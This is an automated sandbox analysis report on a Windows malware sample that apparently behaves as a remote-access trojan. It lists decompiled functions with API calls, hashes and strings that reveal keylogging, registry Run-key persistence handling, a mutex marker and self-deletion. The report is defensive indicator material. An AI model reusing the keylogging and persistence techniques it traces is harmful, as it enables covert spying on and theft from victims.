                                                                                • Instruction Fuzzy Hash: AA21A135204211AFC300AF61CC88CAFBBBDEFCA714F10052EF90693151DB399945CBA6
                                                                                Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                Strings
                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                • API String ID: 481472006-1507639952
                                                                                • Opcode ID: 9eb55951fabd34ca0bb1d07baae63512bdae916bc2a115767729c70cbd458cad
                                                                                • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                • Opcode Fuzzy Hash: 9eb55951fabd34ca0bb1d07baae63512bdae916bc2a115767729c70cbd458cad
                                                                                • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                Function 00784C21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 00784C58
                                                                                  • Part of subcall function 0079A8ED: GetLocalTime.KERNEL32(00000000), ref: 0079A907
                                                                                • GetLocalTime.KERNEL32(?), ref: 00784CB5
                                                                                Strings
                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 00784C4C
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                • API String ID: 481472006-1507639952
                                                                                • Opcode ID: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                                                • Instruction ID: dee1f4dff377f8c604d5363c69c1b7ad82f28c5d6cd73b961a34aed6c3c03a53
                                                                                • Opcode Fuzzy Hash: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                                                • Instruction Fuzzy Hash: 1A210871A45240ABC710F7289C0E76ABBD457D5301F54046DF94903263EBAC558A87AB
                                                                                Function 0041A686 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                                • API String ID: 481472006-2430845779
                                                                                • Opcode ID: 619e3ed541efa4aa09b7a1d695d1d57e01108c7d68543a13579d8524fcb85e28
                                                                                • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                • Opcode Fuzzy Hash: 619e3ed541efa4aa09b7a1d695d1d57e01108c7d68543a13579d8524fcb85e28
                                                                                • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                Function 00786A7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 00786A9C
                                                                                  • Part of subcall function 007869CB: _wcslen.LIBCMT ref: 007869EF
                                                                                  • Part of subcall function 007869CB: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 00786A50
                                                                                • CoUninitialize.COMBASE ref: 00786AF5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                                • String ID: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe
                                                                                • API String ID: 3851391207-232929776
                                                                                • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                • Instruction ID: 6e86decbc005f1853bf1892efbb756bef9114f0d1fea23cc258257d39f141850
                                                                                • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                • Instruction Fuzzy Hash: D4019E72385711BBE2287B21DC4EF7B7758DF41766F21812EFA419B181EAA9EC004762
                                                                                Function 00792855 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00792879
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007928AF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID: TUF
                                                                                • API String ID: 3660427363-3431404234
                                                                                • Opcode ID: b09a7c0ab263ba9602d255bab372d31fcc1af682bb43ba0fd7320c28ba140ab5
                                                                                • Instruction ID: 951e120faf07649d7e7824f8ca85d9ba41de01828a42f4ec1ab6b57a53bbecec
                                                                                • Opcode Fuzzy Hash: b09a7c0ab263ba9602d255bab372d31fcc1af682bb43ba0fd7320c28ba140ab5
                                                                                • Instruction Fuzzy Hash: 35014FB6A00108FFEF04AB95DC4AEFE7ABDEB48251F14407AF901E2241E6B59F009770
                                                                                Function 00419E89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExistsFilePath
                                                                                • String ID: alarm.wav$xIG
                                                                                • API String ID: 1174141254-4080756945
                                                                                • Opcode ID: e9ed3ee058f202d1f9c7932032e2a2c9931c4f06c7ec149372ddb4776638e356
                                                                                • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                • Opcode Fuzzy Hash: e9ed3ee058f202d1f9c7932032e2a2c9931c4f06c7ec149372ddb4776638e356
                                                                                • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                Function 0079A0F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0079A115
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExistsFilePath
                                                                                • String ID: TUF$xIG
                                                                                • API String ID: 1174141254-2109147017
                                                                                • Opcode ID: 2fae138b2d3ec9b0a0b8c660c1a787d1356efb4be69c0d9f0b79cf6aaa7c8617
                                                                                • Instruction ID: 40e34c3d307383d9a926e827ed6b65a6f92320510842cece824baa8623cae804
                                                                                • Opcode Fuzzy Hash: 2fae138b2d3ec9b0a0b8c660c1a787d1356efb4be69c0d9f0b79cf6aaa7c8617
                                                                                • Instruction Fuzzy Hash: 6801B160784305E6CE28F674A81FAAE37558B81751F50802AF85A472E3EF6C9946C3DB
                                                                                Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                • String ID: Online Keylogger Stopped
                                                                                • API String ID: 1623830855-1496645233
                                                                                • Opcode ID: 5261c192baa11886afb01b4bdc85cc0cf986bdca5956bb61acdae837da7fee36
                                                                                • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                • Opcode Fuzzy Hash: 5261c192baa11886afb01b4bdc85cc0cf986bdca5956bb61acdae837da7fee36
                                                                                • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                Function 0078A9CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0078AADD: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0078AAEB
                                                                                  • Part of subcall function 0078AADD: wsprintfW.USER32 ref: 0078AB6C
                                                                                  • Part of subcall function 0079A8ED: GetLocalTime.KERNEL32(00000000), ref: 0079A907
                                                                                • CloseHandle.KERNEL32(?), ref: 0078AA31
                                                                                • UnhookWindowsHookEx.USER32 ref: 0078AA44
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                • String ID: Online Keylogger Stopped
                                                                                • API String ID: 1623830855-1496645233
                                                                                • Opcode ID: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                                                • Instruction ID: f5d8d7500d0a5bafdcb702fdd3fcb6b63cf089273cd874d0e17e57a492091500
                                                                                • Opcode Fuzzy Hash: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                                                • Instruction Fuzzy Hash: 20014730A40200FBDB2A7B28D90F7BE7BB19B41311F50049EF58202993EB6D5886D3E7
                                                                                Function 0079BEDD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,rFx,00000000,00000000,00475B70), ref: 0079BF05
                                                                                • LocalFree.KERNEL32(?,rFx,?,?,?,?,?,?,?,?,00784672), ref: 0079BF2B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FormatFreeLocalMessage
                                                                                • String ID: rFx
                                                                                • API String ID: 1427518018-1355379873
                                                                                • Opcode ID: 3e22f03d05fcdbdbe52dc5561e4f85e92917f23f5798d6ea130983a73d284de5
                                                                                • Instruction ID: 19aa1be328d0d5c9574a7a03704aeb23380fd5a48ec26ae681804ebef34c6b33
                                                                                • Opcode Fuzzy Hash: 3e22f03d05fcdbdbe52dc5561e4f85e92917f23f5798d6ea130983a73d284de5
                                                                                • Instruction Fuzzy Hash: 3FF0C835B40109FBCF08B765EC4ECFF767DDF80305B200039B512A2192EA689D069B24
                                                                                Function 00447790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocaleValid
                                                                                • String ID: IsValidLocaleName$j=D
                                                                                • API String ID: 1901932003-3128777819
                                                                                • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                  • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                                                  • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                  • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                  • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                  • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                                                  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                • String ID: [AltL]$[AltR]
                                                                                • API String ID: 2738857842-2658077756
                                                                                • Opcode ID: b4cccdf447d18c4678ef73824f5fad50f9366b566c9ebd5cc6a6d0182ee0f3f8
                                                                                • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                • Opcode Fuzzy Hash: b4cccdf447d18c4678ef73824f5fad50f9366b566c9ebd5cc6a6d0182ee0f3f8
                                                                                • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                Function 00448803 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00448825
                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFreeHeapLast_free
                                                                                • String ID: `@$`@
                                                                                • API String ID: 1353095263-20545824
                                                                                • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: State
                                                                                • String ID: [CtrlL]$[CtrlR]
                                                                                • API String ID: 1649606143-2446555240
                                                                                • Opcode ID: d3e74cc80152ad2e2070e2cfc6b9d246520ae092978fb33fbbfe51e986ec2b66
                                                                                • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                • Opcode Fuzzy Hash: d3e74cc80152ad2e2070e2cfc6b9d246520ae092978fb33fbbfe51e986ec2b66
                                                                                • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteOpenValue
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                • API String ID: 2654517830-1051519024
                                                                                • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                Function 0040AF77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteDirectoryFileRemove
                                                                                • String ID: pth_unenc
                                                                                • API String ID: 3325800564-4028850238
                                                                                • Opcode ID: 4546e6e0ba58337ae7336522498a141f2916029a30d3b6ad4aab1b42fa748339
                                                                                • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                • Opcode Fuzzy Hash: 4546e6e0ba58337ae7336522498a141f2916029a30d3b6ad4aab1b42fa748339
                                                                                • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                Function 00411699 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ObjectProcessSingleTerminateWait
                                                                                • String ID: pth_unenc
                                                                                • API String ID: 1872346434-4028850238
                                                                                • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                Function 0078C13E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0078DC11,0000000D,00000033,00000000,00000032,00000000,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0078C14D
                                                                                • GetLastError.KERNEL32 ref: 0078C158
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateErrorLastMutex
                                                                                • String ID: Rmc-GJDISH
                                                                                • API String ID: 1925916568-2180735960
                                                                                • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                • Instruction ID: 9f2ac141c10321d03b2d74ab5ce2db352619db766377004c44dd6f6a74267eb3
                                                                                • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                • Instruction Fuzzy Hash: 8DD01270B483019BD7282B747C8E7693554E784703F004079B50FC55D1CF6888409A15
                                                                                Function 0044E0EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CommandLine
                                                                                • String ID: (7h
                                                                                • API String ID: 3253501508-443647764
                                                                                • Opcode ID: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                                                                • Instruction ID: 13d69598d350970c9b91df73096b24a53109b9b907d0ea4b726438dfa3130670
                                                                                • Opcode Fuzzy Hash: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                                                                • Instruction Fuzzy Hash: 09B0027D8157009FC7419F79BD5D1443BA0B75861339094B5DC19C7B35DA358085EF18
                                                                                Function 0043FA5E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                • GetLastError.KERNEL32 ref: 0043FB02
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                Memory Dump Source
